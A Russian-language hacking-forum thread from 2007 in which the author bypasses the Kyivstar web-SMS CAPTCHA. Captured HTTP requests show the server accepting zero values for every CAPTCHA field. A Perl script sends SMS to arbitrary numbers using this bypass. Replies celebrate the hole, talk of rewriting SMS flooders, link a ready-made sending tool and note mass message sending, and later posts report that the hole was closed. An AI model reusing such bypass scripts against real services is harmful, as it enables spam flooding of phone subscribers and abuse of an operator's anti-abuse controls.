Форум АНТИЧАТ - kyivstar CAPTHA III

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - kyivstar CAPTHA III (https://forum.antichat.xyz/showthread.php?t=45934)

kyivstar CAPTHA III

обход CAPTCHA III

Краткая история CAPTCH''
~~~~~~~~~~~~~~~

-CAPTCHA I

Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _http://forum.antichat.ru/thread36930-dspam.html

-CAPTCHA II
Упустим этот раздел.
Пусть останется в секрете ее обход (давно уже переделали ;) )

-CAPTCHA III
//После обсуждений киевстара с "vvs777" (03.08.2007)
началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть
Впечатление было ужасное .
После набранного номера и теста , нажав отправить я был в недоумении "Вкажіть 2 картинки живої природи",я подумал уже что
обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов .
И что я увидел:

Код:

POST /_sms/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*

Referer: http://kyivstar.net/_sms/?lang=ua

Accept-Language: ru

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: kyivstar.net

Content-Length: 240

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger



submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085&code=0102

Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках :))

Код:

Cookie: countSms=3;

,покопавшись, попробовал передавать везде 0

Код:

POST /_sms/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*

Referer: http://kyivstar.net/_sms/?lang=ua

Accept-Language: ru

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: kyivstar.net

Content-Length: 240

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger



submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0

Тем хто непонял
я заменил ключи (которые генерируются фиг знает, каким способом )

Код:

code=1186099766

code=96055154

code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085

code=0102

Заменил на

Код:

code=0

code=0

code=0

code=0

После отправки модифицированного пакета на мой телефон пришло сообщение :)

Ниже приведу простой пример отправки сообщение на перле..

Код:

#!/usr/bin/perl  

# 03.08.2007

# http://mobilnik.ua/news/12301.html  :) 



use LWP;

use LWP::UserAgent; 

use strict;

my $browser = LWP::UserAgent->new;                            

   $browser->agent('New captha v3.0');        

   #$browser->proxy(['http'] => 'http://61.47.2.249:8080');  

print q(

         -------------------------------------- 

        |                          | - | + | x |

         -------------------------------------- 

        |   specical for antichat.ru   _______ |

        |   ------------------------- |       ||  

        |      icq:212-905-288        |   ?   ||

        |   ------------------------- |_______||

         -------------------------------------- );



    

my $mob_code     = "097";

my $mob_number   = "XXXXXXX";

my $messenge     = "hello antichat.ru";

my $curr_cookie  = "countSms=0; 

                    isUserLogined=false; 

                    countSms=0; 

                    messageID=20070702223308.610CC7%40messenger";



printf "\n\n\t[+]Send   %s-%s \n\tmessage:  \<<%s\>> ",

        $mob_code,$mob_number,$messenge ;

    

my $url="http://kyivstar.net/_sms/?lang=ua";

my $response = $browser->post($url,

     ["submitted"  =>  "true",        

      "lang"        =>  "ua",

      "sms_adv"     =>  "101",       

      "mobcode"     =>  $mob_code,

      "number"      =>  $mob_number, 

      "lat"         =>  1,

      "message"     =>  $messenge,

      "code"        =>  0,

      "code"        =>  0,

      "code"        =>  0,

      "code"        =>  0],

      "Content-Type"=>  "application/x-www-form-urlencoded",

      "Cookie"      =>  $curr_cookie);

Важно :
1-Материал исключительно в ознакомительных целях!
2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.

Респект.
Держи + в репу.
Тема действительно работает. Киевстаровские кодеры или недоучки или с компании зарплату получают не за месяц а за кол-во работ =) что в принципе правильно. Полностью поменяв алгоритм картинки они забыли о главном =) - о проверке правильности инпута.
Вчера ввели новую проверку на ботовитость а сегодя той проверке пришел белый и пушистый.

Так что все у кого мобильник с Киевстаром - отключаемся на пару дней потому что то что будет когда то прочитают ... с4 в ужосе и медвед схавал свой превед.

Жаль не застал я времена http://www.kyivstar.net/cgi-bin/sms.pl с параметрами to_addr и new_body.

Тема имхо достойна раздела "Статьи".

Добавил: и вот еще моя реализация метода на Делфи - консольная софтинка =)
http://vvs777.ho.com.ua/sms/KS_SMS3.rar
на архиве пароль - он есть в каждой теме Форума.
(если б не сделал этот мини-квест не знаю что было бы :D )

блин, придется опять переписывать флудера *((

Сьогодні з вашої Ip-адреси відправлено 44 коротких повідомлення.

Ваш ліміт на короткі повідомлення на сьогодні вичерпано.

Сьогодні з вашої Ip-адреси відправлено 4 коротких повідомлення.

они лолы

Точно что лолы. Придется переписывать Флудера. на днях будет готово

У меня спрашивают пасс на архив.
Это английские 2 слова, содержащиеся рядом на видном месте вначале каждой темы на Ачате.

http://forum.antichat.ru/showthread.php?p=428044#post428044
воть

Цитата:

Невірно вибрано картинки живої природи.

дырку закрыли???

pass на архив был "post reply"

это ты отправил больше 100 месаг за день

Точно закрыли.. Моей ZeroSMS пришел тоже белый и пушистый..

Все :)
Белый и пушистый.
Пусть еще команда Киевстара в новостях после сообщения о том что ввели супер-кибер-епт-новую антиспам систему напишут что на следующий день эту систему на*бали =)

Ждем продолжения балета :)

Креатив в тему от меня:
http://vvs777.ho.com.ua/main.phtml?creates.htm
а именно
http://vvs777.ho.com.ua/creatiff/capcha_posle.jpg
это новая капча =)
оригинал взят из упоминавшейся Demonoid'ом в 1 посте новостной ленты
http://mobilnik.ua/news/12301.html

пофиксено описаное в старте. клозед